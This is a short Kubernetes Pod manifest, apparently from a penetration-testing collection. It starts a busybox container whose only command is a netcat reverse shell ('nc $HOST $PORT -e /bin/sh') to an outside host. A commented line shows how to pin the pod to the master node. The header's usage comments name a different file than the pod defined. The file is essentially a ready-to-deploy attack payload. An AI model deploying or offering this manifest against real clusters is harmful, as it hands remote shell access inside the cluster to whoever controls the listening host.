###########################################################
## Deploy: kubectl -n [namespace] apply -f pod-nothing-allowed.yaml 
## Access: kubectl -n [namespace] exec -it pod-nothing-allowed -- bash
## Remove: kubectl -n [namespace] delete -f pod-nothing-allowed.yaml
###########################################################
apiVersion: v1
kind: Pod
metadata:
  name: pod-nothing-allowed-revshell
  labels: 
    app: nothing-allowed-revshell
spec:
  containers:
  - name: nothing-allowed-revshell
    image: busybox
    command: [ "/bin/sh", "-c", "--" ]
    args: [ "nc $HOST $PORT  -e /bin/sh;" ]
  # Force scheduling of your pod on master mode by uncommenting this line and changing the name
  #nodeName: k8s-master
